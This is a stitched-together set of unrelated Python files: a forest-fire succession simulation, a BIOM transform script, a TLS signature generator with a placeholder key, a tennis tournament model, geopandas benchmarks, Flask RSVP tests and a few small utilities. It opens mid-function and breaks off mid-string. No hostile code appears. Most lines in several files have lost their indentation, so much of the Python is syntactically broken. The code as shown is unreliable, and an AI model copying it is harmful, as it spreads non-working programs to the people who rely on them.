distance = 10*math.sqrt((x-x_)**2+(y-y_)**2)
if distance:
dist.append(distance)
x = min(dist)
#calculate the probability with that distance
if (name == "Deciduous" or name == "Pine"):
return math.exp(-5*x/100)
elif (name == "Oak"):
return (1/(x*2.34*math.sqrt(2*math.pi)))\
* math.exp(-(math.log(x) - 46.7)**2/(2*2.34**2))
elif (name == "Transistion"):
return (1/3.0)*(math.exp(-5*x/100) +\
math.exp(-5*x/100) + \
(1/(x*2.34*math.sqrt(2*math.pi))) * \
math.exp(-(math.log(x) - 46.7)**2/(2*2.34**2)))
else:
return 0
def NextState(self,x,y):
temp = [[],[]]
for name in self.TransistionNames[self.grid[x][y].name]:
temp[0].append(self.CoefficentOfTransisiton(x,y,name))
temp[1].append(name)
return temp[1][temp[0].index(max(temp[0]))]
    def GetTransistionTime(self,x,y):
        return self.grid[x][y].transistionTIME
def Evolve(self):
for x in range(self.N):
for y in range(self.N):
if self.grid[x][y].transistionTIME == 0:
previous = self.grid[x][y].GetSpecies()
name = self.grid[x][y].GetNext()
self.distribution[name] += 1
self.distribution[previous] -= 1
self.SpeciesLocations[name].append((x,y))
self.SpeciesLocations[previous].remove((x,y))
self.grid[x][y].Transistion(name,self.fuels[name])
nXt = self.NextState(x,y)
self.grid[x][y].SetTransistion(nXt,self.TransistionTimes[name][nXt])
else:
self.grid[x][y].Update()
def GetDistribution(self):
dist = dict()
for key,value in self.distribution.items():
dist[key] = value/self.N**2
return dist
def SetElevations(self,elevation_data):
for x in range(self.N):
for y in range(self.N):
self.grid[x][y].UpdateElevation(elevation_data[x][y])
def SetWeatherFunc(self,WeatherFunc_=0):
if WeatherFunc_:
self.WeatherFunc = WeatherFunc_
else:
def foo (loc,day,yr):
return (0,0)
self.WeatherFunc = foo
def SetWildFireProb(self,ProbFunc_=0,r=1/10.0):
if ProbFunc_:
self.WildFireProb = ProbFunc_
else:
def foo (day,yr):
return r/365
self.WildFireProb = foo
def SetWeather(self,day,yr):
for x in range(self.N):
for y in range(self.N):
weather = self.WeatherFunc((x,y),day,yr)
                self.grid[x][y].UpdateWeather(weather[0], weather[1])
def UpdateWeights(self,weights_):
self.weights = weights_
def GetNeighbors(N,loc):
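        # Return the Moore neighborhood (up to 8 adjacent cells) of loc, clamped
        # to the N x N grid and excluding loc itself.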
x_lower = -1
x_upper = 2
y_lower = -1
y_upper = 2
if (loc[0] == 0):
x_lower = 0
elif (loc[0] == N - 1):
x_upper = 1
if (loc[1] == 0):
y_lower = 0
elif (loc[1] == N - 1):
y_upper = 1
neighbors = []
for i in range(x_lower,x_upper):
for j in range(y_lower,y_upper):
x = loc[0] + i
y = loc[1] + j
neighbors.append((x,y))
neighbors.remove(loc)
return neighbors
def WildFire(self,FF_INFO,intial=(0,0),day_yr=(0,0),rand_intensity=False):
self.onFIRE = True
self.grid[intial[0]][intial[1]].SetOnFire()
Fire_Locations = [intial]
fire_fighters = 0
fire_fighters_max = False
while (self.onFIRE):
Spread_Locations = set()
if fire_fighters_max:
fire_fighters = FF_INFO[0]
else:
xp = 0
fire_fighters = 0
for coeff in FF_INFO[1]:
fire_fighters += int(coeff*len(Fire_Locations)**xp)
xp += 1
if fire_fighters > FF_INFO[0]:
fire_fighters = FF_INFO[0]
fire_fighters_max = True
for x,y in Fire_Locations:
#FireFighters Here
if fire_fighters > 0:
pExtinguished = FF_INFO[-1][self.grid[x][y].GetSpecies()]
if uniform.rvs(scale = 1,size=1)[0] < pExtinguished:
self.grid[x][y].Extinguished()
else:
self.distribution[self.grid[x][y].GetSpecies()] -= 1
self.distribution["Burned"] += 1
self.grid[x][y].SetTransistion("Shrubland",3)
self.SpeciesLocations["Burned"].append((x,y))
self.SpeciesLocations[self.grid[x][y].GetSpecies()].remove((x,y))
self.grid[x][y].Burned()
Spread_Locations.update(Forest.GetNeighbors(self.N,(x,y)))
fire_fighters -= 1
else:
self.distribution[self.grid[x][y].name] -= 1
self.distribution["Burned"] += 1
self.grid[x][y].SetTransistion("Shrubland",3)
self.SpeciesLocations["Burned"].append((x,y))
self.SpeciesLocations[self.grid[x][y].name].remove((x,y))
self.grid[x][y].Burned()
Spread_Locations.update(Forest.GetNeighbors(self.N,(x,y)))
Fire_Locations.clear()
for x,y in Spread_Locations:
if rand_intensity:
intensity = 1/uniform.rvs(scale = 2,size=1)[0]
else:
intensity = 1
W_ = self.WeatherFunc((x,y),day_yr[0],day_yr[1])
self.grid[x][y].UpdateWeather(W_[0],W_[1])
Probibility_of_Burn = self.grid[x][y].Pburn(self.weights,intensity)
if uniform.rvs(scale = 1,size=1)[0] < Probibility_of_Burn:
#Shits On Fire Yo
Fire_Locations.append((x,y))
self.grid[x][y].SetOnFire()
if len(Fire_Locations) == 0:
self.onFIRE = False
def WildFireGIF(self,FF_INFO,files,intial=(0,0),rand_intensity=False):
images = dict()
for key, value in files[0].items():
images[key] = mpimg.imread(value)
fire = mpimg.imread(files[1])
water = mpimg.imread(files[2])
fig, axarr = plt.subplots(self.N, self.N)
fig.set_size_inches(self.N*1.25, self.N)
plt.subplots_adjust(wspace=0, hspace=0)
for i in range(self.N):
for j in range(self.N):
axarr[i,j].imshow(images[self.grid[i][j].fuel])
axarr[i,j].axis('off')
#change directory gif directory
os.chdir('images/gifs')
outFile = "wildfires"
plt.savefig(outFile+"0000.png")
self.onFIRE = True
self.grid[intial[0]][intial[1]].SetOnFire()
Fire_Locations = [intial]
axarr[intial[0],intial[1]].cla()
axarr[intial[0],intial[1]].imshow(fire)
axarr[intial[0],intial[1]].axis('off')
plt.savefig(outFile+"0001.png")
fire_fighters = 0
fire_fighters_max = False
time = 1
while (self.onFIRE):
Spread_Locations = set()
if fire_fighters_max:
fire_fighters = FF_INFO[0]
else:
xp = 0
fire_fighters = 0
for coeff in FF_INFO[1]:
fire_fighters += int(coeff*len(Fire_Locations)**xp)
xp += 1
if fire_fighters > FF_INFO[0]:
fire_fighters = FF_INFO[0]
fire_fighters_max = True
for x,y in Fire_Locations:
#FireFighters Here
if fire_fighters > 0:
pExtinguished = FF_INFO[-1][self.grid[x][y].name]
if uniform.rvs(scale = 1,size=1)[0] < pExtinguished:
self.grid[x][y].Extinguished()
axarr[x,y].cla()
axarr[x,y].imshow(water)
axarr[x,y].axis('off')
else:
self.distribution[self.grid[x][y].name] -= 1
                        self.distribution["Burned"] += 1
self.grid[x][y].Burned()
axarr[x,y].cla()
axarr[x,y].imshow(images[0])
axarr[x,y].axis('off')
Spread_Locations.update(Forest.GetNeighbors(self.N,(x,y)))
fire_fighters -= 1
else:
self.distribution[self.grid[x][y].name] -= 1
                    self.distribution["Burned"] += 1
self.grid[x][y].Burned()
axarr[x,y].cla()
axarr[x,y].imshow(images[0])
axarr[x,y].axis('off')
Spread_Locations.update(Forest.GetNeighbors(self.N,(x,y)))
Fire_Locations.clear()
for x,y in Spread_Locations:
if rand_intensity:
intensity = 1/uniform.rvs(scale = 2,size=1)[0]
else:
intensity = 1
yr = int(time/365)
day = time - 365*yr
W_ = self.WeatherFunc((x,y),day,yr)
self.grid[x][y].UpdateWeather(W_[0],W_[1])
Probibility_of_Burn = self.grid[x][y].Pburn(self.weights,intensity)
if uniform.rvs(scale = 1,size=1)[0] < Probibility_of_Burn:
#Shits On Fire Yo
Fire_Locations.append((x,y))
self.grid[x][y].SetOnFire()
axarr[x,y].cla()
axarr[x,y].imshow(fire)
axarr[x,y].axis('off')
time += 1
str_time = '0'*(4-len(str(time)))+str(time)
out_file = outFile + str_time + ".png"
plt.savefig(out_file)
if len(Fire_Locations) == 0:
self.onFIRE = False
#Create txt file for gif command
fileList = glob.glob('*.png') #star grabs everything,
fileList.sort()
#writes txt file
file = open('FileList.txt', 'w')
for item in fileList:
file.write("%s\n" % item)
file.close()
os.system('convert -delay 75 @FileList.txt ' + files[-1] + '.gif')
os.system('del FileList.txt')
os.system('del *.png')
os.chdir('../..')
def Display(self,files):
images = dict()
for key, value in files[0].items():
images[key] = mpimg.imread(value)
fire = mpimg.imread(files[1])
water = mpimg.imread(files[2])
fig, axarr = plt.subplots(self.N, self.N)
fig.set_size_inches(self.N*1.5, self.N)
plt.subplots_adjust(wspace=0, hspace=0)
for x in range(self.N):
for y in range(self.N):
if self.grid[x][y].burning:
axarr[x,y].imshow(fire)
axarr[x,y].axis('off')
elif self.grid[x][y].putout:
axarr[x,y].imshow(water)
axarr[x,y].axis('off')
else:
axarr[x,y].imshow(images[self.grid[x][y].fuel])
axarr[x,y].axis('off')
plt.savefig(files[-1])
plt.clf()
def TimeSeries(self,WildFireINFO,yrs=50):
data = dict()
data[0] = self.GetDistribution()
n = 1
for yr in range(1,yrs+1):
#r_nums = uniform.rvs(scale = 1,size=365)
if yr == 10*n:#min(r_nums) < self.WildFireProb(day,yr):
intial = (random.randint(0,self.N-1),random.randint(0,self.N-1))
self.WildFire(WildFireINFO[0],intial,(0,0),WildFireINFO[1])
print(self.distribution)
n+=1
data[yr] = self.GetDistribution()
self.Evolve()
return data
def PlotDistOverTime(self,data,outfile):
#Make List arrays
species = dict()
for name in self.names:
species[name] = []
time = []
for key, value in data.items():
time.append(key)
for key, value in value.items():
species[key].append(value)
sns.set()
fig, ax = plt.subplots(1)
for key in species:
#if not key == "Burned":
ax.plot(time,species[key],linewidth=2.0,label=key)
fig.set_size_inches(16, 12)
plt.axis([0, time[-1], 0, 1.0])
plt.xlabel('Time (Years)')
plt.ylabel('Fraction of Population')
plt.legend()
plt.savefig(outfile+".png")
if __name__ == "__main__":
burned = ("Burned",0,0)
shrubland = ("Shrubland",500,32.123751)
decidiuous = ("Deciduous",500,8.648680706)
pine = ("Pine",500,12.355258)
Transistion_forest = ("Transistion",500,9.884206521)
oak = ("Oak",500,8.648680706)
IntialDist = [burned, shrubland, decidiuous, pine, Transistion_forest, oak]
N = 50
wits = [.05,0,0,0]
test = Forest(N,IntialDist,wits)
ff_prob = dict()
for name in test.names:
ff_prob[name] = 1.0/3
FF_info = [25,[0,.1,.01,.001],ff_prob]
WFINFO = [FF_info,True]
data = test.TimeSeries(WFINFO,500)
outfile = "TimeSeries10FIRES100yrs"
test.PlotDistOverTime(data,outfile)
# burn = []
# for i in range(100):
# init_ = (random.randint(0,N-1),random.randint(0,N-1))
# test.WildFire(FF_info,intial=init_,rand_intensity=True)
# burn.append(test.distribution["Burned"]/2500)
# test = Forest(N,IntialDist,wits)
# print(i)
#
#
# avg = sum(burn)/len(burn)
# std_ = np.std(np.asanyarray(burn))
#
# print(avg," : ",std_)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Apply various transforms to data in a BIOM-format
table.
"""
from __future__ import absolute_import, division, print_function
# standard library imports
import argparse
from gzip import open as gzip_open
# 3rd party imports
import biom
import numpy as np
try:
import h5py
HAVE_H5PY = True
except ImportError:
HAVE_H5PY = False
# local imports
import phylotoast
def write_biom(biom_tbl, output_fp, fmt="hdf5", gzip=False):
"""
Write the BIOM table to a file.
:type biom_tbl: biom.table.Table
:param biom_tbl: A BIOM table containing the per-sample OTU counts and metadata
to be written out to file.
    :type output_fp: str
:param output_fp: Path to the BIOM-format file that will be written.
:type fmt: str
:param fmt: One of: hdf5, json, tsv. The BIOM version the table will be
output (2.x, 1.0, 'classic').
"""
opener = open
mode = 'w'
if gzip and fmt != "hdf5":
if not output_fp.endswith(".gz"):
output_fp += ".gz"
opener = gzip_open
mode = 'wt'
# HDF5 BIOM files are gzipped by default
if fmt == "hdf5":
opener = h5py.File
gen_str = "PhyloToAST v{} (phylotoast.org)".format(phylotoast.__version__)
biom_tbl.generated_by = gen_str
with opener(output_fp, mode) as biom_f:
if fmt == "json":
biom_tbl.to_json(biom_tbl.generated_by, direct_io=biom_f)
elif fmt == "tsv":
biom_f.write(biom_tbl.to_tsv())
else:
biom_tbl.to_hdf5(biom_f, biom_tbl.generated_by)
return output_fp
def relative_abd(biom_tbl):
return biom_tbl.norm(inplace=False)
def log10(biom_tbl):
log10_tfm = lambda data, id_, md: np.nan_to_num(np.log10(data))
return biom_tbl.transform(log10_tfm, inplace=False)
def relative_abd_log10(biom_tbl):
tbl_norm = relative_abd(biom_tbl)
return log10(tbl_norm)
def arcsin_sqrt(biom_tbl):
"""
Applies the arcsine square root transform to the
given BIOM-format table
"""
arcsint = lambda data, id_, md: np.arcsin(np.sqrt(data))
tbl_relabd = relative_abd(biom_tbl)
tbl_asin = tbl_relabd.transform(arcsint, inplace=False)
return tbl_asin
transforms = {"arcsin_sqrt": arcsin_sqrt,
"ra": relative_abd,
"log10": log10,
"ra_log10": relative_abd_log10}
def handle_program_options():
"""Parses the given options passed in at the command line."""
    parser = argparse.ArgumentParser(description="This script applies various "
                                     "transforms to the data in a given "
                                     "BIOM-format table and outputs a new "
                                     "BIOM table with the transformed data.")
parser.add_argument("-i", "--biom_table_fp", required=True,
help="Path to the input BIOM-format table. [REQUIRED]")
parser.add_argument("-t", "--transform", default="arcsin_sqrt",
choices=transforms.keys(),
help="The transform to apply to the data. Default: "
"arcsine square root.")
parser.add_argument('--fmt', default="hdf5",
choices=["hdf5", "json", "tsv"],
help="Set the output format of the BIOM table.\
Default is HDF5.")
parser.add_argument('--gzip', action='store_true',
help="Compress the output BIOM table with gzip.\
HDF5 BIOM (v2.x) files are internally\
compressed by default, so this option\
is not needed when specifying --fmt hdf5.")
parser.add_argument("-o", "--output_fp", required=True,
help="Output path for the transformed BIOM table."
"[REQUIRED]")
parser.add_argument('-v', '--verbose', action='store_true')
return parser.parse_args()
def main():
args = handle_program_options()
biom_tbl = biom.load_table(args.biom_table_fp)
tbl_tform = transforms[args.transform](biom_tbl)
write_biom(tbl_tform, args.output_fp, fmt=args.fmt, gzip=args.gzip)
if args.verbose:
print("Transformed table written to: {}".format(args.output_fp))
if __name__ == '__main__':
main()
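# Usage sketch for the command-line interface defined above; the script name
# and the input/output paths here are hypothetical placeholders:
#   python transform_biom.py -i otu_table.biom -t arcsin_sqrt --fmt hdf5 -o otu_table_asin.biom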
|
import base64
import zlib
import json
import time
# The python ecdsa library can be downloaded from https://github.com/warner/python-ecdsa
# or from the link shared by TLS technical support: http://share.weiyun.com/24b674bced4f84ecbbe6a7945738b9f4
# After downloading, enter its root directory and run the following command to install it:
# python setup.py install
# The command below converts the private key format:
# openssl ec -outform PEM -inform PEM -in private.pem -out private_ec.pem
# -in takes the downloaded private key; -out is the converted private key file
from ecdsa import SigningKey,util
import hashlib
# Fill in your application's own private key here
ecdsa_pri_key = """
your_private_key
"""
def base64_encode_url(data):
base64_data = base64.b64encode(data)
# type(base64_data) ->bytes
base64_data = bytes.decode(base64_data).replace('+', '*')
base64_data = base64_data.replace('/', '-')
base64_data = base64_data.replace('=', '_')
return base64_data
def base64_decode_url(base64_data):
base64_data = base64_data.replace('*', '+')
base64_data = base64_data.replace('-', '/')
base64_data = base64_data.replace('_', '=')
raw_data = base64.b64decode(base64_data)
return raw_data
class TLSSigAPI:
""""""
__acctype = 0
__identifier = ""
__appid3rd = ""
__sdkappid = 0
__version = 20190114
    __expire = 3600*24*30  # Defaults to one month; adjust this value if you need a different validity period
__pri_key = ""
__pub_key = ""
_err_msg = "ok"
def __get_pri_key(self):
return self.__pri_key_loaded
def __init__(self, sdkappid, pri_key):
self.__sdkappid = sdkappid
self.__pri_key = pri_key
self.__pri_key_loaded = SigningKey.from_pem(self.__pri_key)
def __create_dict(self):
m = {}
m["TLS.account_type"] = "%d" % self.__acctype
m["TLS.identifier"] = "%s" % self.__identifier
m["TLS.appid_at_3rd"] = "%s" % self.__appid3rd
m["TLS.sdk_appid"] = "%d" % self.__sdkappid
m["TLS.expire_after"] = "%d" % self.__expire
m["TLS.version"] = "%d" % self.__version
m["TLS.time"] = "%d" % time.time()
return m
def __encode_to_fix_str(self, m):
fix_str = "TLS.appid_at_3rd:" + m["TLS.appid_at_3rd"] + "\n" \
+ "TLS.account_type:" + m["TLS.account_type"] + "\n" \
+ "TLS.identifier:" + m["TLS.identifier"] + "\n" \
+ "TLS.sdk_appid:" + m["TLS.sdk_appid"] + "\n" \
+ "TLS.time:" + m["TLS.time"] + "\n" \
+ "TLS.expire_after:" + m["TLS.expire_after"] + "\n"
return fix_str
def tls_gen_sig(self, identifier):
self.__identifier = identifier
m = self.__create_dict()
fix_str = self.__encode_to_fix_str(m)
pk_loaded = self.__get_pri_key()
sig_field = pk_loaded.sign(fix_str.encode(), hashfunc=hashlib.sha256, sigencode=util.sigencode_der)
sig_field_base64 = base64.b64encode(sig_field)
s2 = bytes.decode(sig_field_base64)
m["TLS.sig"] = s2
json_str = json.dumps(m)
# type(json_str) -> str
sig_cmpressed = zlib.compress(json_str.encode()) # json_str bytes-like -> bytes
# type(sig_cmpressed) ->bytes
base64_sig = base64_encode_url(sig_cmpressed) # sig_cmpressed bytes-like -> bytes
return base64_sig
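# Debugging sketch (not part of the original API): undo the URL-safe base64 and
# zlib steps to inspect the JSON payload of a generated sig. Note this only
# unpacks the sig; it does not verify the ECDSA signature.
def inspect_sig(sig):
    raw_json = zlib.decompress(base64_decode_url(sig))
    return json.loads(raw_json)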
def main():
api = TLSSigAPI(1400001052, ecdsa_pri_key)
sig = api.tls_gen_sig("xiaojun")
    print(sig)
if __name__ == "__main__":
main()
|
from abc import ABC, abstractmethod
from xquant.portfolio import Portfolio
class Strategy(ABC):
'''
Strategy
--------
    An abstract base class that serves as the parent class of the user's strategy.
The user must create a child class and implement the stock_selection method.
'''
def __init__(self, strategy_name) -> None:
self.strategy_name = strategy_name
@abstractmethod
def stock_selection(self, funds, date) -> Portfolio:
'''selects a portfolio of stocks and shares from the stock selection universe'''
pass
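# A minimal sketch of a concrete strategy, assuming Portfolio can be built from
# a {ticker: shares} mapping; the real xquant.portfolio.Portfolio constructor
# may differ, so treat this example as illustrative only.
class BuyAndHoldStrategy(Strategy):
    '''Toy strategy: always picks the same fixed tickers, one share each.'''
    def __init__(self):
        super().__init__('buy_and_hold')
    def stock_selection(self, funds, date) -> Portfolio:
        # Hypothetical universe; a real strategy would screen stocks using funds/date.
        tickers = ['AAPL', 'MSFT', 'GOOG']
        return Portfolio({ticker: 1 for ticker in tickers})  # assumed constructor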
|
from os import path
import yaml
from so_crawl.crawl import fetch_snippets
def _get_name_from_question_link(full_link):
# First, throw away the anchor part of the link...
anchor_pos = full_link.find('#')
if anchor_pos >= 0:
full_link = full_link[:anchor_pos]
# Now, get the final part of link, and convert to title
link = path.basename(full_link)
parts = link.split('-')
return ' '.join([
part.title() for part in parts
])
def _get_filepath_for_snippet(snippet, path_to_dir):
# First, throw away the anchor part of the link...
anchor_pos = snippet.url.find('#')
if anchor_pos >= 0:
full_link = snippet.url[:anchor_pos]
else:
full_link = snippet.url
# Now, get the final part of link, and use as filename
# To be safe, make sure to use utf8 for filepath compatibility
link = path.basename(full_link).encode('utf-8')
filename = '{}.p2'.format(link)
filepath = path.join(path_to_dir, filename)
    # Let's make sure we aren't overwriting an existing file.
    # To be safe, let's bound the number of attempts to a reasonable number like 100.
    # (Bonus: this also keeps the code more functional, without manual loop counters.)
for i in xrange(100):
if not path.exists(filepath):
break
        filename = '{}({}).p2'.format(link, i + 1)  # keep the .p2 extension when de-duplicating
filepath = path.join(path_to_dir, filename)
# By design, if 100 attempts fail to find a unique filepath,
# the 100th duplicate is overwritten...
return filepath
def _snippet_to_source(snippet):
title = _get_name_from_question_link(snippet.url)
meta = {
'name': title,
'language': 'py',
'created_on': snippet.retrieved_at,
'created_by': snippet.author,
'retrieved_from': snippet.url,
'references': [snippet.extra_url]
}
yaml_meta = yaml.dump(meta, default_flow_style=False)
return u'---\n{}...\n{}'.format(yaml_meta, snippet.code)
def pull_snippets(num_snippets, start_time, end_time, extra_tags, save_to_dir):
snippets = fetch_snippets(num_snippets, start_time, end_time, extra_tags)
for snippet in snippets:
full_source = _snippet_to_source(snippet)
output_filepath = _get_filepath_for_snippet(snippet, save_to_dir)
with open(output_filepath, 'w') as output_file:
# Encode Late: Convert string to utf8 just before writing
output_file.write(full_source.encode('utf-8'))
return len(snippets)
|
class ArbolBinario:
def __init__(self, valor, izquierda=None, derecha=None):
self.__valor = valor
self.__izquierda = izquierda
self.__derecha = derecha
def insertar_izquierda(self, valor):
self.__izquierda = ArbolBinario(valor)
return self.__izquierda
def insertar_derecha(self, valor):
self.__derecha = ArbolBinario(valor)
return self.__derecha
def devolver_valor(self):
return self.__valor
def imprimir(self, nivel=0):
espacios = nivel * ' '
print('%s%d' % (espacios, self.__valor))
if self.__izquierda:
self.__izquierda.imprimir(nivel + 1)
if self.__derecha:
self.__derecha.imprimir(nivel + 1)
return None
def fibonacci(termino):
if termino == 0:
return termino
elif termino == 1:
return termino
else:
return fibonacci(termino - 2) + fibonacci(termino - 1)
def arbol_fibonacci(termino):
if termino == 0:
return ArbolBinario(termino)
elif termino == 1:
return ArbolBinario(termino)
else:
izquierda = arbol_fibonacci(termino - 2)
derecha = arbol_fibonacci(termino - 1)
valor = izquierda.devolver_valor() + derecha.devolver_valor()
arbol = ArbolBinario(valor, izquierda, derecha)
return arbol
if __name__ == '__main__':
n = int(input())
while n >= 0:
arbol = arbol_fibonacci(n)
arbol.imprimir()
print('====')
n = int(input())
|
import random
from geopandas import GeoDataFrame, GeoSeries
from shapely.geometry import Point, LineString, Polygon, MultiPolygon
import numpy as np
class Bench:
param_names = ['geom_type']
params = [('Point', 'LineString', 'Polygon', 'MultiPolygon', 'mixed')]
def setup(self, geom_type):
if geom_type == 'Point':
geoms = GeoSeries([Point(i, i) for i in range(1000)])
elif geom_type == 'LineString':
geoms = GeoSeries([LineString([(random.random(), random.random())
for _ in range(5)])
for _ in range(100)])
elif geom_type == 'Polygon':
geoms = GeoSeries([Polygon([(random.random(), random.random())
for _ in range(3)])
for _ in range(100)])
elif geom_type == 'MultiPolygon':
geoms = GeoSeries(
[MultiPolygon([Polygon([(random.random(), random.random())
for _ in range(3)])
for _ in range(3)])
for _ in range(20)])
elif geom_type == 'mixed':
g1 = GeoSeries([Point(i, i) for i in range(100)])
g2 = GeoSeries([LineString([(random.random(), random.random())
for _ in range(5)])
for _ in range(100)])
g3 = GeoSeries([Polygon([(random.random(), random.random())
for _ in range(3)])
for _ in range(100)])
geoms = g1
geoms.iloc[np.random.randint(0, 100, 50)] = g2
geoms.iloc[np.random.randint(0, 100, 33)] = g3
print(geoms.geom_type.value_counts())
df = GeoDataFrame({'geometry': geoms,
'values': np.random.randn(len(geoms))})
self.geoms = geoms
self.df = df
def time_plot_series(self, *args):
self.geoms.plot()
def time_plot_values(self, *args):
self.df.plot(column='values')
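# Manual run sketch (outside an asv benchmark runner): set up one geometry type
# and time a single plotting call. Plotting requires matplotlib to be installed.
if __name__ == '__main__':
    import timeit
    bench = Bench()
    bench.setup('Point')
    print('plot series:', timeit.timeit(bench.time_plot_series, number=1))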
|
# coding=UTF-8
# vim: set fileencoding=UTF-8 :
'''
DESCRIPTION
TennisModel is sample module of classes for simulating tennis tournaments.
Contains business logic of tennis Single Elimination Tournaments.
'''
import random
import model.tournaments as tmt
def is_in_interval(value):
    '''Helper function to test whether the value is in our interval (0-9).'''
assert isinstance(value, int)
if 0 <= value < 10:
return True
return False
class TennisPlayer(tmt.Competitor):
'''
Sample implementation of tennis player
'''
def __init__(self, name='', ability=0, fh=0, bh=0):
'''
Constructor
'''
super().__init__(name)
self.ability = ability
self.forehand = fh
self.backhend = bh
def __str__(self):
return "TennisPlayer:" + self.name
@property
def ability(self):
'''Tennis player ability from 0 to 9. More is better.'''
return self.__ability
@ability.setter
def ability(self, value):
assert isinstance(value, int) and is_in_interval(value), \
'Value must be int between 0 and 9.'
self.__ability = value
@property
def forehand(self):
'''Tennis player property for forehand'''
return self.__forehand
@forehand.setter
def forehand(self, value):
assert isinstance(value, int) and is_in_interval(value), \
'Forehand must be int between 0-9.'
self.__forehand = value
@property
def backhend(self):
'''Tennis player property for backhand'''
return self.__backhend
@backhend.setter
def backhend(self, value):
assert isinstance(value, int) and is_in_interval(value), \
'Backhand must be int between 0-9.'
self.__backhend = value
class TennisGameScore(tmt.Score):
'''
Sample implementation of tennis score for a game in one set.
'''
def evaluate_score(self):
first = max((self.score_competitor1, self.score_competitor2))
second = min((self.score_competitor1, self.score_competitor2))
if first < 6:
# no one is set winner
return 0
elif (first >= 6 and first - second >= 2) or \
(first == 7 and second == 6):
# somebody wins the set
if self.score_competitor1 > self.score_competitor2:
return 1
elif self.score_competitor1 < self.score_competitor2:
return -1
else:
return 0
class TennisMatchScore(tmt.Score):
'''
Sample representation of tennis match score with individual sets scores.
'''
def __init__(self, score1=None, score2=None):
super().__init__(score1, score2)
self.set_scores = []
def add_set_score(self, set_score):
assert isinstance(set_score, TennisGameScore)
self.set_scores.append(set_score)
class TennisMatch(tmt.Match):
'''
Custom implementation of tennis match
'''
def __play_game(self):
        '''
        Evaluates a duel between the competitors for one game in a set.
        @return: 1 if the game winner is the home player, 2 if it is the away player
        '''
while True:
home = random.randrange(1, 6) \
+ self.competitor1.ability \
+ self.competitor1.forehand \
+ self.competitor1.backhend
away = random.randrange(1, 6) \
+ self.competitor2.ability \
+ self.competitor2.forehand \
+ self.competitor2.backhend
if home != away:
break
if home > away:
return 1
else:
return 2
def play_match(self, sets=3):
        '''
        Plays out the tennis match game by game and set by set.
        @param sets: number of sets needed to win the match
        '''
if self.info is None:
raise tmt.MatchInfoError('Pointer is not set to MatchInfo object.')
# for every set:
# for every game evaluate players properties and change set score
# after every set change score object for sets
match_score = TennisMatchScore(0, 0)
while True:
set_score = TennisGameScore(0, 0)
while True:
game_winner = self.__play_game()
if game_winner == 1:
set_score.add_home_score(1)
elif game_winner == 2:
set_score.add_away_score(1)
state = set_score.evaluate_score()
if state != 0:
if state == 1:
match_score.add_home_score(1)
elif state == -1:
match_score.add_away_score(1)
match_score.add_set_score(set_score)
break
if match_score.get_max_score() == sets:
# match ended
self.info.score = match_score
self.info.evaluate(self.competitor1, self.competitor2)
break
class TennisSET(tmt.SingleEliminationTournament):
'''
Custom implementation for Tennis example
'''
def _init_round_list(self, i):
return [TennisMatch(info=tmt.MatchInfo()) for _ in range(2 ** i)]
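# A small sketch exercising only what this module defines: a validated player
# and a set score. It assumes the tmt.Score base class maps its two constructor
# arguments to score_competitor1/score_competitor2, which the code above relies
# on; running a full TennisMatch or TennisSET needs the rest of the
# model.tournaments API and is not shown here.
if __name__ == '__main__':
    player = TennisPlayer('Ada', ability=7, fh=6, bh=5)
    print(player)  # TennisPlayer:Ada
    print(TennisGameScore(6, 3).evaluate_score())  # 1 -> the first competitor took the set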
|
"""
Utility methods for use during training & evaluation
"""
def load_dataset(dataset_file, narrative_token, dialog_token, eos_token):
sequence = []
with open(dataset_file, "r", encoding="utf-8") as f:
for line in f:
line = line.strip()
if line == "":
if len(sequence) > 0:
example = "".join(sequence)
sequence.clear()
yield example
else:
prefix_token = narrative_token if line[:3] == "[N]" else dialog_token
sequence.append(prefix_token + line[5:] + eos_token)
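# Usage sketch. The file name and the special tokens below are hypothetical;
# the expected file format (inferred from the parsing above) is one utterance
# per line, narrative lines starting with "[N]", all other lines treated as
# dialog, and blank lines separating examples.
if __name__ == "__main__":
    for example in load_dataset("stories.txt", "<narrative>", "<dialog>", "<eos>"):
        print(example)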
|
"""Test rsvp module"""
from app.tests.basetest import BaseTest
class RsvpMeetup(BaseTest):
"""Rsvps tests class"""
def test_if_no_data(self):
"""Tests if no data is provided in rsvps creation"""
respon = self.client.post(
"/api/v1/meetups/1/rsvps")
self.assertEqual(respon.status_code, 400)
self.assertIn('Please provide a json data',
str(respon.data))
def test_if_fields_missing(self):
"""Tests if some fields are missing in rsvps creation"""
respon = self.client.post(
"/api/v1/meetups/1/rsvps", json=self.rsvp, content_type='application/json')
self.assertEqual(respon.status_code, 400)
self.assertIn('Some fields are missing',
str(respon.data))
def test_rsvps_creation(self):
"""tests if rsvps can be posted"""
self.client.post("/api/v1/user/register", json=self.new_user19, content_type='application/json')
self.client.post(
"/api/v1/meetups", json=self.meetup, content_type='application/json')
respon = self.client.post(
"/api/v1/meetups/1/rsvps", json=self.rsvp1, content_type='application/json')
self.assertEqual(respon.status_code, 201)
self.assertIn('Rsvps successfully created',
str(respon.data))
def test_if_user_exists(self):
"""tests if user exists in rsvps creation"""
respon = self.client.post(
"/api/v1/meetups/3/rsvps", json=self.rsvp2, content_type='application/json')
self.assertEqual(respon.status_code, 404)
self.assertIn('That user doesnt exist, plz create a user',
str(respon.data))
def test_if_meetup_exists(self):
"""tests if meetup exists in rsvps creation"""
self.client.post("/api/v1/user/register", json=self.new_user19, content_type='application/json')
respon = self.client.post(
"/api/v1/meetups/10/rsvps", json=self.rsvp3, content_type='application/json')
self.assertEqual(respon.status_code, 404)
self.assertIn('That meetup doesnt exist',
str(respon.data))
def test_data_format_validate_rsvps(self):
"""tests the data format in rsvps"""
respon = self.client.post(
"/api/v1/meetups/1/rsvps", json=self.rsvp4, content_type='application/json')
self.assertEqual(respon.status_code, 400)
self.assertIn("response should not be provided in numbers",
str(respon.data))
def test_empty_space_rsvps(self):
"""tests empty space in rsvps"""
respon = self.client.post(
"/api/v1/meetups/1/rsvps", json=self.rsvp5, content_type='application/json')
self.assertEqual(respon.status_code, 400)
self.assertIn("response should not be empty",
str(respon.data))
|
#tests models
tests_model = {
'RGraph': [
{
'Title': 'Tree Animation',
'Description':
"""
A static JSON Tree structure is used as input for this visualization.<br /><br />
<b>Click</b> on a node to move the tree and center that node.<br /><br />
The centered node's children are displayed in a relations list in the right column.<br /><br />
<b>Use the mouse wheel</b> to zoom and <b>drag and drop the canvas</b> to pan.
""",
'Extras': ['excanvas.js'],
'Example': True
},
{
'Title': 'Test removing nodes.',
'Description':
"""
Testing the RGraph with a simple static JSON structure and removing a subtree.
The Subtree having "Matt Cameron" as root node should be removed with an animation
